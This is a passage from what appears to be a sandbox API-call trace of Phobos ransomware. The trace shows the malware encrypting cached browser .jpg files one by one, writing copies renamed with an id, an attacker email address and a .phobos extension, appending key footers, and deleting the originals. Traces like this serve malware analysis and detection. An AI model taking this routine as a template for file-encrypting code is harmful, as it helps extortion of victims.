phKey=0x2f4fc84*=0xa32aa8) returned 1 [0186.866] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.866] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x9d7, lpOverlapped=0x0) returned 1 [0186.920] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9e0, dwBufLen=0x9e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9e0) returned 1 [0186.920] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x9e0, lpOverlapped=0x0) returned 1 [0186.921] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0186.921] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.921] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.921] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.921] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.921] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0186.921] CloseHandle (hObject=0x140) returned 1 [0186.921] CloseHandle (hObject=0x124) returned 1 [0186.922] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeZ0k[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeez0k[1].jpg")) returned 1 [0186.922] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfAc5[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefac5[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0186.923] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2141) returned 1 [0186.923] CloseHandle (hObject=0x124) returned 1 [0186.923] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfAc5[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefac5[1].jpg")) returned 0x2020 [0186.923] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfAc5[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefac5[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfAc5[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefac5[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0186.923] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.923] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfAc5[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefac5[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.924] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0186.924] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.924] ReadFile (in: hFile=0x124, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x85d, lpOverlapped=0x0) returned 1 [0186.934] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x860, dwBufLen=0x860 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x860) returned 1 [0186.934] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x860, lpOverlapped=0x0) returned 1 [0186.935] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0186.935] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.935] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.935] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.935] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.935] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0186.935] CloseHandle (hObject=0x124) returned 1 [0186.935] CloseHandle (hObject=0x140) returned 1 [0186.936] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfAc5[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefac5[1].jpg")) returned 1 [0186.936] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfjuT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefjut[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.937] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2942) returned 1 [0186.937] CloseHandle (hObject=0x140) returned 1 [0186.937] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfjuT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefjut[1].jpg")) returned 0x2020 [0186.937] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfjuT[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefjut[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.937] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfjuT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefjut[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.938] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.938] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfjuT[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefjut[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0186.938] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0186.938] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.938] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb7e, lpOverlapped=0x0) returned 1 [0186.968] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb80, dwBufLen=0xb80 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb80) returned 1 [0186.968] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb80, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb80, lpOverlapped=0x0) returned 1 [0186.969] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a68) returned 1 [0186.969] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.969] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.969] CryptDestroyKey (hKey=0xa32a68) returned 1 [0186.969] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.969] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0186.969] CloseHandle (hObject=0x140) returned 1 [0186.969] CloseHandle (hObject=0x124) returned 1 [0186.969] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfjuT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefjut[1].jpg")) returned 1 [0186.970] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRwv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefrwv[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0186.970] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=11116) returned 1 [0186.971] CloseHandle (hObject=0x124) returned 1 [0186.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRwv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefrwv[1].jpg")) returned 0x2020 [0186.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRwv[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefrwv[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRwv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefrwv[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0186.971] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.971] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRwv[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefrwv[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.972] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0186.972] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.972] ReadFile (in: hFile=0x124, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2b6c, lpOverlapped=0x0) returned 1 [0186.976] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2b70, dwBufLen=0x2b70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2b70) returned 1 [0186.976] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2b70, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2b70, lpOverlapped=0x0) returned 1 [0186.977] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0186.977] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.977] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.977] CryptDestroyKey (hKey=0xa32a28) returned 1 [0186.977] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.977] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0186.977] CloseHandle (hObject=0x124) returned 1 [0186.977] CloseHandle (hObject=0x140) returned 1 [0186.977] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRwv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefrwv[1].jpg")) returned 1 [0186.978] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.978] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfwtU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefwtu[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.979] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=9846) returned 1 [0186.979] CloseHandle (hObject=0x140) returned 1 [0186.979] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfwtU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefwtu[1].jpg")) returned 0x2020 [0186.979] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfwtU[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefwtu[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfwtU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefwtu[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.979] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.979] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfwtU[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefwtu[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0186.980] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0186.980] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.980] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2676, lpOverlapped=0x0) returned 1 [0186.996] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2680, dwBufLen=0x2680 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2680) returned 1 [0186.996] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2680, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2680, lpOverlapped=0x0) returned 1 [0186.997] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0186.997] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.997] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.997] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.997] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.997] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0186.997] CloseHandle (hObject=0x140) returned 1 [0186.997] CloseHandle (hObject=0x124) returned 1 [0186.997] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfwtU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefwtu[1].jpg")) returned 1 [0186.998] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgD9f[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegd9f[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0186.999] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=9718) returned 1 [0186.999] CloseHandle (hObject=0x124) returned 1 [0186.999] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 